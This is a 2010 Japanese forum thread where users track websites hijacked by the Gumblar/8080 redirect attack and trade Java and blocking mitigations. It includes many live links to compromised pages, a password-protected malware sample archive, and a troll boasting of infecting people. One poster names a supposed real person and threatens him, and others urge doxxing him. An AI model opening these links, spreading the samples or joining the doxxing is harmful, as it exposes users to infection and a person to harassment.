nihonshu■fukunekodo■com/index/
sweet■fukunekodo■com/index/
cosme■fukunekodo■com/index/
make■fukunekodo■com/index/
car■fukunekodo■com/index/
mens■fukunekodo■com/index/
pc■fukunekodo■com/index/
baby■fukunekodo■com/index/
diet■fukunekodo■com/index/　たぶん他にもあると思う

失敗？
inner■fukunekodo■com/index/
fashion■fukunekodo■com/index/
acces■fukunekodo■com/index/
golf■fukunekodo■com/index/
meet■fukunekodo■com/index/
bekkan■fukunekodo■com/index/　

どっちもru:8080

>>665
ホームページ制作会社
Collco - 株式会社コルコ
ttp://www●collco●jp/works/index.html
↑
ttp://www.virustotal.com/jp/analisis/5b775a22571016560950fe2bd81349e73163483a3e199beb7292c32612555b37-1270944263

世もまつだww

コルコ倒産しろ

>>689
世も末(すえ)な
日本語は正しく使いましょう

マジにネタレスｶｯｺｲｲ

>>688 fukunekodo●com
絞り込んでみた
ttp://search●yahoo●co●jp/search?p=site%3Afukunekodo●com%2F+%22function%22&ei=UTF-8&fr=top_ga1_sa&x=wrt
検索結果 約193件(多少の巻き込み有)

>>689
www●collco●jp/
↓巻き込み改竄↓
www●kyoudoumusen●jp/

／(^o^)＼やっちまった
･･･ということだなｗ

>>693
fukunekodoひどいな

コルコはorz×100000000000

利用されるくらいならやめちまえと書き込みを控えるつもりでいたが、
ちょっと気になったので賢明な諸兄の判断を仰ぎたく・・・

http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.aparajeyo.org%2Findex.php&x=53&y=7
> www●saidenterprise●com:2095/login/

ウイルスかな？
違ってたらすまない、本当に少し気になっただけなんだ

>>695
www●aparajeyo●org/index●php
avastが反応、JS:Illredir-AL

絶賛崩壊中ｗ
ソース見た限りでは.ru:8080だな
下のアドレスはどこから？

と思ったら下にあったのかorz
Web Mailって書いてあるから、ポート2095はたぶん関係ないと思う

>>696
すまない、ありがとう

【陥落サイトのURL悪用厳禁】
www●nadara●jp ←途中で切れてる
npo-aichi●or●jp/ ← ＼(^o^)／
creole●jp/
kumarin●biz/

npo-aichi
4発(本文3発.js1発)仕込みｗｗｗ

しかし何で途中で切れたりするんだろ

www●amakusaturigu●com
hrhr●sakura●ne●jp ←ブログ？

>>700
それはいつも思う、どうしてだろうね？

650のままだった事と、>>636で未来の自分に安価打ってた事に
今頃気が付いたｗ

名無しさんに戻りますね

加速度的に被害広がってるのに、話題的にはどんどん静まってきてるのはなんでだろう
現実逃避？

ttp://headlines.yahoo.co.jp/hl?a=20100409-00000031-inet-secu

そういえば、cmsツールの脆弱性とか聞いた覚えがあったw

iner●kz/index2●php

Googleにリダイレクト
77●221●153●178/go2/in●phpの代替かも…よく判らない


>>703
対策取っとけば怖くない現実に辿り着いたんだよきっとｗ

誰も感染しなくなって、ガンブラーが廃れて、このスレも要らなくなる
それが何より望ましい事なんだからそれはそれで良い結末だけどね

>>704
これ以降の話？
ttp://www.itmedia.co.jp/enterprise/articles/1004/08/news068.html

>>705
前にHP作成会社に聞いた話で
複数のHPを管理していて改竄されたのが一つだけ
自動更新するソフトを使ってるHPだけが改竄されたとか
IPAと警察庁に報告する様お願いしたけど

んで、今日同じ様な話しを聞いて思い出したw

>>703
対策や予防方法が広く認知されるようになったからだろう。
わかっていても検証コスト等の理由で後手に回っているサーバの改ざんは広がっていても
閲覧するだけの個人ユーザに被害が及ばなくなれば話題としては収束するさ。

>>700
npo-aichiはサイト内全滅でござる
/content/include/xoops●js
/content/modules/xhld0/phpdate●js
/content/modules/xhld1/phpdate●js
/content/modules/xhld2/phpdate●js
/content/modules/xhld3/phpdate●js
jsも全滅ｗ

これはひどいｗｗｗ

報告アドレスが結構悪用されてるな
感染を広げる一因にもなってるんじゃねｗ

報告アドレスを難読化させればよいんじゃね？

>>711
おまい頭いいなｗｗｗ

> 報告アドレスを難読化

こんな感じかな？
http:%2F%2Fwww.jc-consulting.jp%2F
http:%2F%2Fwww.amakusaturigu.com%2Fhtml%2F
http:%2F%2Fwww.niaufuku.com%2Findex.htm

ちなみに踏んでも無害だから安心しる！

>>713
こゆのはどないだ？(苦笑
687474703a2f2f7777772e6a632d636f6e73756c74696e672e6a702f
687474703a2f2f7777772e616d616b7573617475726967752e636f6d2f68746d6c2f0d0a
687474703a2f2f7777772e6e69617566756b752e636f6d2f696e6465782e68746d0d0a

この程度でいいんじゃね？
aHR0cDovL3d3dy5leGFtcGxlLmNvbS8K
aHR0cDovL3d3dy4yY2gubmV0Lwo=
aHR0cDovL3BjMTEuMmNoLm5ldC90ZXN0L3JlYWQuY2dpL3NlYy8xMjY4MDU5Njg0Lwo=

javaに0dayだってさ。

>>714　へっくし案
>>715　はっぱ案

d3d3LnNha2lrby5qcA==
こうすれば良いんだな？

\x68\x74\x74\x70\x3a\x2f\x2f の時は捜しやすかったんだが･･･
発掘されやすいから %68%74%74%70%3a%2f%2f こうしたのかな？
↓
ttp://search●yahoo●co●jp/search?p=%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3a%5Cx2f%5Cx2f%22&search.x=1&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=

aHR0cDovL3d3dy5hZ3VzZS5qcC8/bT13JnVybD1odHRwJTNBJTJGJTJGd3d3LmRhaW5pLXN1cnZleS5jb20lMkYmeD00NiZ5PTQ=
ここって1回閉鎖したんじゃなかった？

www●bandoolshien●com

nodさんが反応しました

難読化云々よりここに晒す前に凸ってればいいのでは？

凸だけじゃどうせスルーされるか隠蔽されるだけだから公表すべきだけど
みんなに知らせるって意味じゃ難読化してちゃ意味ないんだよな

まあ2chに貼られたURL無用心に踏む奴もなあ
俺は2chに貼ってあるURLは全てgredとaguseでチェックしてるけど

そこらへんはひっかかるほうも悪いよな
グロでもウイルスでも2chじゃ無用心に踏む方も悪い
グロ踏んで学習するかウイルス踏んで学習するかの違いだろう
貼るバカを肯定するわけじゃないけどな

張るバカよりも踏むバカのほうが悪いって感覚が蔓延してる限り悪用はなくならんよ
不特定多数の人間がいる場所では常に用心はすべきだというのは紛れもない事実だけどね

URL貼られることの多いスレとかはテンプレに　
※貼られたURLが安全だということは保障できません　踏む前に必ずブラクラチェック等行いましょう※
くらい入れてもいい気はする

ドライビングバイダウンロード攻撃突撃ｨ！

どこへドライブ行くんだよ

不利な対策ソフトを使っている人は不幸だねぇ

ガンブラー系に限ってならDr.WEBが強いから心配な人は使ってみれば

Dr.WEB リンクチェッカー
http://drweb.jp/support/link_checker.html

コマンドの例
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
Gumblar/8080 Checker=http://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/$TEXT$LINK

www●collco●jp/
コルコの方、こっそり修正している様ですが
告知はまだですか？

先程は検討をしてると言っていましたね
未だに告知をしていない様ですが…

それとね、貴方達は修正したつもりなのでしょうけど
リダイレクターはまだ残っているのです
改竄は完全には修正されてはいないのです

他の方からメールで教えて貰った事を全て完全に実行しなさい
>>584を心に刻み、心を入れ替えなさい
真摯な姿勢こそが大切だとは思わないのですか

>>733
せめて安価は>>606にｗ

＞ リダイレクター
確認すた。。。。

情報処理推進機構：情報セキュリティ：ウイルス・不正アクセス届出状況について（3月分および第1四半期）
http://www.ipa.go.jp/security/txt/2010/04outline.html
＞ ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
＞ ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
＞ ・ 改ざんの事実の説明
＞ ・ 改ざんされていた箇所
＞ ・ 改ざんされていた期間
＞ ・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害（ウイルス感染など）の説明
＞ ・ ウイルスのチェック方法の説明（必要に応じてオンラインスキャンサイトの紹介など）
＞ ・ 問い合わせ用窓口の連絡先

>>733
それについてはエヌピーオー愛知ネットも気になるね

昨日、NPO-AICHIの登録担当と技術担当、倉敷CATVの技術担当のメアドに
aguseの調査結果を送ってさしあげたら何の説明もなしに閉鎖してたさ

"災害時の確実な情報伝達を目的とするNPO法人"とか何のジョークだよｗ

>>736
役に立たない鳩耳に密告しておくか・・・・

>>736
ｲ牛のNPOからスクリプトは除去したってメルきたお。
その時点ではスクリプトはなくなってた。
IPAに被害報告してってことと>>735のこと書いて返信したら403になった。
思案中かも。

>>738
おやそうでしたか、それは失礼しました…

明日の朝までに緑になってますように (-人-)
ttp://www.google.com/url?q=http%3A%2F%2Fonline%2Eus%2Edrweb%2Ecom%2Fresult%2F%3Furl%3Dhttp%253A%252F%252Fwww%252Ecollco%252Ejp%252Finquiry%252Findex%252Ephp

JAVA Web Startの0-day対策は

javaws.exeをHIPS等で無効化
Firefoxだったら、Java Deployment Toolkitプラグインを無効化

とかでいいのかな？
どうも情報が少なくてよくわからない。

これか。

ttp://japan.cnet.com/news/sec/story/0,2000056024,20411906,00.htm
>　Ormandy氏がこの脆弱性についてSun Microsystemsに連絡したと
>ころ、四半期ごとの通常の修正パッチ公開スケジュール外でパッチを
>公開するほど緊急度が高いとは考えていない、との返事だったという。

またしばらく放置される訳ですね、わかります。Sunはマジで死ね。

>>736
倉敷CATVも感染してたのか・・・実家の地元局でケーブル引いてるだけになんか凄い残念だな

>>740
指摘されないとわからないバカの集団らしいなｗ
/inquiry
<!--トロイを絶賛配布中！（無料）-->
↑追記しておけｗｗｗｗｗ

>>743
whoisかaguse見れ
魚青 211.125.125.234の管理

>>742
とりあえずHIPSを使うまでもなく、NTFSのアクセス権設定でjavaws.exe（C:\Program Files\
Java\jre6\binとC:\WINDOWS\system32の二つある、よくわからないのでとりあえず両方）の
読み取りと実行を拒否した状態で、以下テストページでjavaws.exeが実行されないことを確認。
ttp://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html

ただ、本当に情報が少なくてこれが緩和策になっているのかよくわからない。

>>745
どゆことなの?出されたIPを調べたらnpo-aichi.or.jpって出たが
npo-aichiの登録・技術担当と倉敷CATVの技術担当が同じって事?

もしその通りって事だと倉敷CATVは今感染してなくとも危ないって事?

>>746
Operaでプラグイン入れてないと読み込みが完了しないかんじ。

>>747
大家と店子の関係

マスターペニス

ドライビングバイ海老名SAダウンロード

深刻な危険

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2211

a2FkYXJ1Lm15ZG5zLnRvLw== ←再発
d3d3LmFtYWt1c2F0dXJpZ3UuY29tLw0K
----
6Zml6JC944K144Kk44OI44GuVVJM44KS6YGK44Gz44O744GE44Gf44Ga44KJ55uu55qE44Gn6LK84
4KL44GK44OQ44Kr44GV44KT44Gv44CB6ISz44G/44Gd44Gu44Kv44Oq44O844Oz44Kk44Oz44K544
OI44O844OrKOWGjeaVmeiCsinjgYzlv4XopoHjgaDjgajmgJ3jgo/jgozjgb7jgII=
･･･ということですｗ

>>740
77y8KF5vXinvvI/jgqrjg6/jgr8=

http://www.jc-consulting.jp/
http://www.footsal-club.net/
http://www.oracle-shop.net/
http://pacific-staff.net/
http://hoikuen.19th.org/
http://sunrise.2pg.in/
http://netnavi.boo.jp/leopalace/link/
http://www.toutyann.com/
http://ayaka.echoll.net/
http://dog-g-club.com/
http://www.bestofunder.com/
http://moebox.com/link.html
http://www.ferahdondurma.com/
http://www.e-tokunaga.co.jp/contents/house_dock/index.html
http://www.vericapandilovska.com.mk/
http://this.is/ausgot/
http://capvex.com/
http://egujarat.net/
http://jyo.eisuku.com/home/
http://www.borneomarathon.com/jpn/home.html
http://www.aparajeyo.org/index.php
http://www.niaufuku.com/index.htm
http://kumarin.biz/
http://www.amakusaturigu.com/html/
http://www.bandoolshien.com/
http://www.hdta.jp/

きゅ〜い！きゅ〜い！（ｷﾘｯ

ばーか

確信犯死ねよ

aHR0cDovL2Jvby4yY2gubmV0L2JvbzIwMDguY2dpP3R5cGU9cmVkJmJvbzIwMDhfdXJpPWh0dHAl
M0ElMkYlMkZwYzExLjJjaC5uZXQlMkZ0ZXN0JTJGcmVhZC5jZ2klMkZzZWMlMkYxMjY4MDU5Njg0
JTJGNzU0JmJvbzIwMDhfdGltZT0yMDEwJTJGMDQlMkYxMyUyOCU4OSVDRSUyOSsxMyUzQTQzJTNB
NDMmYm9vMjAwOF9pZD0mYm9vMjAwOF9wb3J0PSZib28yMDA4X3RyaXA9


>>753
77y8KF5vXinvvI/jgqrjgr/jg68=

これじゃ、どこのサイトが危険なのか分からん

よかった、うちのサイトは晒されてないわ

コントロールパネル見てて思ったんだが、
J2SE runtime Environment 5.0 update6と
Java(TM)6 update19が一緒に存在してるんだ
これは更新の仕様がないJ2SEを消すべき？それとも両方とも置いておかないといけないモノ？

>>760
古いの消せ

>>757
>串迎撃部隊＠2ch掲示板 -- Boo2008 --
>Good bye 9000
>がいしゅつ!!Done ! -> [BBQ]None(^-^)

>名も無きBoo2008さん、ありがとうですm(_ _)m

>＼(^o^)／オワタ

>>762
IGh0dHA6Ly9qYS53aWtpcGVkaWEub3JnL3dpa2kvJUUzJTgyJUFBJUUzJTgyJUJGJUUzJTgzJUFG

もうJava自体をアンインスコしたんだけど
無くて困ることってなにかある？

あなたが困らなければ無いし、困ればそれ

>>763
＼(^o^)／オタワ

･･････もうやめよう（苦笑）

おーはぴーでーい

>764
Javaに新たな問題が見つかる、多数のブラウザに影響の恐れ
ttp://www.itmedia.co.jp/enterprise/articles/1004/13/news072.html
Java Deployment Toolkitに見つかった新たな問題
launch()メソッドからJava Web Startユーティリティ（javaws.exe）に任意の引数を渡すことができてしまうという
。攻撃者が悪用した場合、ユーザーが細工されたHTMLを閲覧してしまうことで
リモートから任意のJARファイルを実行されてしまう危険がある。

　Java Deployment Toolkitは、Java SE 6 update 10以降をインストールした際に
同時にインストールされる。ブラウザのプラグインやActive-X コントロールとしても利用されるため
Microsoft Internet ExplorerやFirefox、Google ChromeなどWindowsベースの
多数のブラウザに影響が及ぶ可能性がある。

　米Oracleの対応は未定。IPAとJPCERT コーディネーションセンターは
当面の回避策として、ActiveX コントロールやブラウザのJava Deployment Toolkitを
無効にすることを推奨している。

【陥落サイトのURL悪用厳禁】
www●tu-han4●com/hatumo/
www●daini-survey●com/
versamold●com/

難読化はムダっぽい...

Gumblarまとめ
http://labs-uploader.sabaitiba.com/virus/download/1271170314.zip
infected

Javaに未修正の脆弱性、Webページを閲覧するだけで攻撃を受けるおそれ
IE6/7/8や「Firefox」「Google Chrome」などWebブラウザー全般が対象
http://www.forest.impress.co.jp/docs/news/20100413_360951.html

Adobe Readerアップデートきたな

>>772
またなんかありそうだから様子見。
てか、もう Foxit に乗り換えたし。

コンパネ見たがJavaは最近更新したRuntimeしかなかった
上で述べられてるツールキットは最近の奴だとruntime内蔵なのかな？
そうならどうやって無効化するのか……
ActiveXはインターネットオプションで無効化できるんだが

>>774
対象がIEだけなら
ttp://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2010.04/msg00133.html
を参考にKill-Bitを追加すればいい。

複数のブラウザを入れていて、個別ではなく一括で対策したいならjavaws.exeのアクセス権を
読み取り実行拒否に変更してやればいい。
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/04.html#20100412_JAVA

【陥落サイトのURL悪用厳禁】 ←まねしてみた
www●sot●com●al

VirusTotalでの検出結果は5/40(12.5%)
Avast頑張るなぁ

avastは今は知らないが初期の頃はスクリプトの段階で処理しないと防御できなかったからな
スクリプトに対応しなくても防御はできるが
こういう風に特に初心者にアピールにはなるから一生懸命なのだろう

サブPCでavastを使ってるけど>>770の検体の全てに反応した。
メインPCでは某ベンダの有料版を使っているが>>770の検体の検出はまちまちだった。
ただ>>754のサイトでは全てに反応した。
avastはソース段階（スクリプト自体）で検出しているが、
某ベンダは実行段階で検出しているようだ。

そうか。よかったな。

そもそもソースの段階で何を検出してんだ

>>770
AVG Freeが9個しか反応しなかった・・・おぉコワイコワイ

avast5だけど、>>770で３つスルーされた・・・
なるほど、オレはもう掛かってるのか！

>>782
スルーした３つをhttp://www.virustotal.com/jp/で調べてみれば？
無害かも

gumblerにも無害有害があるのか……
つか、最近の亜種だとcmdとregdit動くみたいだし、どういう症状が出るか解らんから
感染してるかどうかすらオンラインスキャン以外じゃわからんよな

>>2の対策してれば、まず感染しないよ

>>783
３つとも解析済みで、検出したのはなかったそうだ
再解析してみたら1つだけ出てきた
Gumblar_js.txt
Sophos 4.52.0 2010.04.14 Troj/JSRedir-BD

【陥落サイトのURL悪用厳禁】
www●nittoka●com/ ←そーすの途中にコードが･･･
discussanctuary●com/からコードごと引っ越したのかな？

www●1a●ad-jeaayf●com/ae/
s6●artemisweb●jp/djtsushin/naruto/part1/index●html ←改竄されてるってばよｗ※jword注意

http://www.tu-han4.com/hatumo/
http://www.daini-survey.com/
http://versamold.com/
http://www.sot.com.al

avast!は文字列自体に反応してるみたいだな
http://i39.tinypic.com/2z8ybts.png

http://www.nittoka.com
http://www.1a.ad-jeaayf.com/ae/
http://s6.artemisweb.jp/djtsushin/naruto/part1/index.html

788
1：きゅい〜ん
2：きゅい〜ん
3：403
4：きゅい〜ん
790
1：きゅい〜ん
2：きゅい〜ん
3：きゅい〜ん

avast!　大勝利ｗ

アバストは警告を発した！しかし、感染してしまった

>>792
なんやねん、それ・・・

KATINOが効かないと全滅するパーティーですか

>>2
(4) JRE(Java Runtime Environment)を最新版に更新する

これはAdobe Readerなんかと同じでWindowsをインストールしただけでは
JREはインストールされないよね？
JREをインストールしていなければ特に気にする必要はないんだよね？
PC初心者でちょっとよくわからないので教えてくれると助かります

初心者であればメーカー製PCを使用している可能性が高い
メーカー製PCにはAdobeReaderもJREもプリインストールされていることがほとんど

コントロールパネルにJavaのアイコンがあればインストールされてる
ちなみにそのアイコンをダブルクリックするとバージョン確認やアップデートもできる

>>795
WindowsをインストールしただけではJAVAは入らないよ
上の人が言うようにメーカー製PCを買った場合は入ってるかもしれない
でもWindowsのCDを使ってOSをインストールしただけではJAVAは入らない

JREはアンインスコor入れないで全然問題ないと思うけどね

君にとってはそうなんだろうが、それを言い出すと最後には「Windowsじゃなくても全然問題
ないと思うけどね」みたいな不毛な話になるから自重しろ。

>>689-740
「不正改ざんに関するお詫び」
Last-Modified: Wed, 14 Apr 2010 07:03:06 GMT : www.collco.jp/index.html

Adobe Reader 修正キタコレ
http://www.forest.impress.co.jp/docs/news/20100414_361134.html

>>801
思うんだが、「不正改ざんされた」ってのは責任逃れだろ。
むしろ、ここのサイト覗いた奴のPC「不正改ざんした」のがこの会社だろうに。

＞※本件による、お客様にお預かりしております個人情報の流出はございません。
お前のサイト覗いたせいでパスとか流出する話しないで、どうすんだよ

0-day対策版？
ttp://java.sun.com/javase/6/webnotes/6u20.html

スレに出ているサイトにクリックしても2割くらいしか反応しない。
ちなみにカスペルスキー2010
これはザルなのか？
設定でオフになってるのかと思いきやそうでもないし

Java Deployment Toolkit 6.0.200.2
Java(TM) Platform SE 6 U20 6.0.200.2

>>805
とりあえず>>770の検体送れ。
話はそれからだm9(^Д^)

>>805
検体提出汁

>>805
反応しないとこは修正済みもあるんじゃね

*:8080/*　をブロックでおｋだよね？
*の位置が分からん

>804
Java Deployment Toolkit の脆弱性を悪用したゼロディ攻撃を観測
https://www-950.ibm.com/blogs/tokyo-soc/entry/javaws-201004?lang=ja
2010年4月15日、Oracle より Java SE 6 Update 20 がリリースされました[5]。
東京SOCでは、上記バージョンの JRE をインストールすることで、本脆弱性への攻撃を
防げることを確認しております。

他の普通のサイトも巻き添えにしていいなら
>>810
巻き添えにしたくないなら
*.ru:8080/*

>>812
最近は.atと.infoも侵食されてるからそれじゃダメ

うむ、8080ポートの先にコンテンツを置くページは巻き添えにされても仕方ないな。

特定のURLブロックしてる人ってどういうソフト使ってますか？
PeerBlockとかあるみたいだけどこれ使えばいいのかな

>>810
ブラウザのJAVAScript切っとけ

>>815
意味ない

>>810
例えば敵方が8090に変った時には8080ブロックは無意味

あたりめえだろ
先のこと考えたら無意味なことばかりだ
現状の防御としては意味があるのだからそれで良いに決まってる

【陥落サイトのURL悪用厳禁】
www1●kamakuranet●ne●jp/artinfo/　メル凸済み



心の和む小ネタをひとつ

http://www.aguse.jp/?m=w&url=helphomecare●at%3A8080&x=15&y=13
↓
http://www.aguse.jp/?m=w&url=helphomecare●at&x=52&y=14
↓
http://a001.aguse.jp/images/img/6d53e388eed6c7f0f5b3404a9e7a1e65f4e47f3c/ea280effbf7dbaa378533a69bd2dc1a216ea0eca_00_x.jpg

Fuck off!

>>817
んじゃどういうソフト使ってるんですかね
avast!5にはURLブロック付いてるようですが

ポート8080ブロックするだけならいろんなファイアウオールで可能だよ
大概のルーター内蔵のでも可能じゃないか

Proxomitron なら正規表現風味の細かい指定が出来る。
セキュ板覗くような人間ならデフォで入れてるソフトだと思ってたんだが違うのか。

違うだろうな

>>823
Proxomitron はよく知らないが
難読化されてるスクリプトも簡単にフィルタリングできるのか？

>>823
入れてるけど使ってない

>>823
無料HPスペースの広告がウザかった時代に使ってたけど、今は使ってない。

>>825
自分でフィルター書かなきゃダメ、もしくは有志の人待ち

>>825
パターンが変わればその都度になるが、現行では一応対応できているけど。
最近は変化が無いからつまらん。

どのみちいらねえよ

Proxomitronの脆弱性放置中

>>820
www1●kamakuranet●ne●jp/artinfo/
メル凸先からttp://www.painters-club.com/homepage-artist.html
に連絡は行ったらしいが、なぜか別のページを閉鎖したらしい

>>822-823
ありがとうございます。
とりあえず手持ちのFWでリモートポート8080番をシャットアウトすればいいんですかね？

まず>>2をやれよと

Javaは早急にu20にしないと危険だべな
Deployment Toolkitの脆弱性が8080インジェクションで使われ始めてるらしいから

なんか、ここの被害報告のヒロまり方見てると、
ダウソ板のイカタコなんて、子供の遊びに見えてくるな

12月下旬から騒ぎ出した気がするけど
4月になっても収まらないね。

>>835
実際子供の遊びだろ

>>2の対策しておけばウイルス対策ソフトはいらない？

いります

java19入ってる状態で20入れたら19がコントロールパネルから消えた
これは上書きされたって事でいいのかな
以前の17→19の時は上書きなんてしなかったから「ひょっとして19のプログラム残ってるんじゃないか」って不安

>>2の対策してれば、あとはActiveXやJavaを自動実行したりしないようにすればおｋかな

20でだいじょうぶなのかな

2ch「三脚」検索でHTML／spoofing Genが・・・どうゆうこと？

>>840
心配なら入れなおせばおｋ

>>840
xpでjava19から20に上書きしたらｆｉｒｅｒｏｘのプラグインに19と20の
Deployment ToolkitがあったのでJava20をアンインストール後に
再度20をインストールした。
そしたら19の姿が消えたので心配なら一度アンインストールをした
方がいいと思う。

>>843
それもそうだな……アンインスコして入れ直してみる

そういえば、ここの文字検索でgoogleがいくつかあるんだが、
ひょっとしてgoogle自体もう全て完全に感染してるのか？
PCが重くなってる様子もメモリ異常に食われてるって事もないんだが……

なんでDeployment Toolkitとか余計なもん入れた

過去のJavaデータとかはJavaRaで消してるなあ

>>831
再度メール出します、ご報告感謝

>>845
どれのことを言ってるの？
URLを理解できていないってことならどっかで勉強してきてください

そもそもgoogle自体が感染してたらここで騒がれるとかそういうレベルじゃ収まらんだろ

>>849
ごめん、URLと検索ワード読み直して大体把握した
感染サイトを探した結果だったのね……

avast、GDataのみヒット

http://www.virustotal.com/jp/analisis/94ff0b47a595324877d535d963346ccfe8e7c70140327fd95498f14c88279c5a-1271428269

>>851
8080じゃないはず(8080はJS:Illredir)
GDataはavastエンジン使ってるから実質avastだけ検知

スレ違いか、すまない

仕込まれる位置とかがちょっと違うようだね
海外では３月下旬くらいから出てるのかな

>>854
定義自体は2009/02/18に追加

http://www.shinsei-fukushi.net/
http://www.plci.net/egf/

>>853
すまないではすまないのだ！

(�VД�V)死ねっ！さぁ死ぬのだ低脳よ

さて朝の挨拶も済んだことだし
ガンブラをガンプラスレにでも貼り貼りしてきますかのう（　�Vд�V）

( ´,дゝ`)フォッフォフォフォーwww

>>858
ようお前にこないだウイルス踏まされたもんじゃボケ！
お前の本名、斎藤智成だろ？住所もググったらあったから請求書送るから待っとけや！ｗ

住所がわかるなら直接行けば？
その方が話が早いだろ

なんか変な人いるけどなにこいつ

('д')うん、確かに変な人いるね
俺様にウィルス踏まされる時点で自己管理が悪いわけで、つまり踏む奴が悪いわけで
これはもう暗黙の了解ならぬ暗黙の常識なわけで(＞ｗ＜)変な人だなぁプｸスｽｽｽwwwwwwwwwwwwww

（�Vд�V）しかも請求書ってなにいってるんだ？
もし俺様が踏ませたウィルスの影響で金銭的な損害を受けたのだとしたら
それは・・・



(�VД�V)ざまあみろだぜ！！！！！！！！！！！！！！！！！！！！！！！！！！！！！

それより俺様、昨日うる星やつらの再放送見逃したから
youtubeでその回見なきゃなんないんだ。
やっぱ80年代の神アニメはうる星やつらだよね。

(*�Vд�V*)デヘヘヘヘヘヘヘベヘヘケヘヘヘヘヘヘヘヘヘヘケewwwwwwwwwwwwwwp

キチガイってどうしてキチガイなんだろう

そりゃーおまえキチガイだからだろ

既出かもだけどこの痕跡は何ですか？

/?N=A
/?M=D
/?S=D
/?D=D
/?N=A

補足、ログの痕跡です。

何回も言われてるけど一回感染するとルートキットとかで雲隠れしやがるようだから検出できるか怪しいし
ウイルス感染したPCでスキャンしても絶対安全と保障できないぞ
心当たりあるんなら素直にクリーンインスコしたほうが良いよ
>>2完璧に実行してブラウザ常時仮想化とかしてて「俺がウイルス感染なんかするわけねーだろばーか！」なら自分を信じていいだろうが

>>868
言ってる事は解らなくもないがこのスレ全否定してるよな、4行目でスレ住人の卑下までやってるし
クリーンインスコなんてみんながみんなホイホイできるわけでもないだろうに

>>862
【間接正犯】
http://ja.wikipedia.org/wiki/%E9%96%93%E6%8E%A5%E6%AD%A3%E7%8A%AF
8080作者のコードを悪用して何等かの被害が発生した時点で成立。

>>870
これぞ本当のざまあ ->862

まあやる気があれば民事でも請求できるでしょ

>>866
アクセスログなら何か試そうとしたんじゃね

>>873

ユーザーディレクトリでのアクセスで
このコマンド？じゃ何も出来ないと思うけど、何かに感染したPCからの痕跡なのか...
ただ、面白いのは、IP調べると日本のＭ＄専用線からのアクセスで
こっそり調べると鯖では無く、クライアントPCっぽい。

>>870
>間接正犯とは、他人の行為を利用して自己の犯罪を実現する正犯のことである。
>共犯ではないというのが通説である。
＜中略＞
>正犯とは、犯罪実現の現実的危険性を有する行為を自ら行う者をいうが、
>「自ら」は規範的理解が可能（緩やかに解することが可能）とする。
>そのうえで、他人を道具として利用する場合は、規範的には「自らの手で」行ったといえ、
>利用者の行為には正犯としての実行行為性が認められるとされる。

8080作者と同じ罪になるって事で･･･
顔文字（糞コテ）オワタｗｗｗｗｗｗｗｗ

誰かVIPに燃料投下してこいよ。
奴らの調査力なら顔文字野郎の個人情報なんてすぐに割れるだろ。

よし、任せたぞ

そして「誰かがやるだろ」とみんな思ってるので
誰も投下しないのであった

だって板別規制されてるし